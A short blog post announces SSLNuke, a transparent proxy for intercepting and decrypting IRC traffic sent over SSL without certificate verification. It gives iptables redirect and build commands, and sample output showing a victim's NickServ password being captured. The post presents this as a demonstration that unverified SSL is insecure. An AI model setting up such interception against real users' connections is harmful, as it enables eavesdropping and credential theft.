SSLNuke - Tool For Intercepting & Decrypting Secure IRC Traffic

SSLNuke is a program designed for decrypting and intercepting "secured" but non-verified IRC traffic. It is basically a transparent proxy that decrypts SSL traffic and prints out IRC messages.

SSL without verification isn't secure at all!


First, add a user account for SSLNuke to run as and add IP tables rules to redirect traffic to it:
# useradd -s /bin/bash -m sslnuke
# grep sslnuke /etc/passwd
# iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner 1000 -m tcp \
  --dport 6697 --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports 4444

Finally, login as SSLNuke, build, and run SSLNuke:
# su -l sslnuke
# cd sslnuke
# make
# ./sslnuke

Run an IRC client and login to your favorite IRC network using SSL, IRC messages will be printed to stdout on SSLNuke.
[*] Received connection from:
[*] Opening connection to:
[*] Connection Using SSL!
[*] -> AUTH ( *** Looking up your hostname...
[*] -> AUTH ( *** Found your hostname
[*] -> victim ( *** You are connected to with
[*] -> nickserv ( id hello
[*] NickServ! -> victim ( Password accepted - you are now

No comments

Powered by Blogger.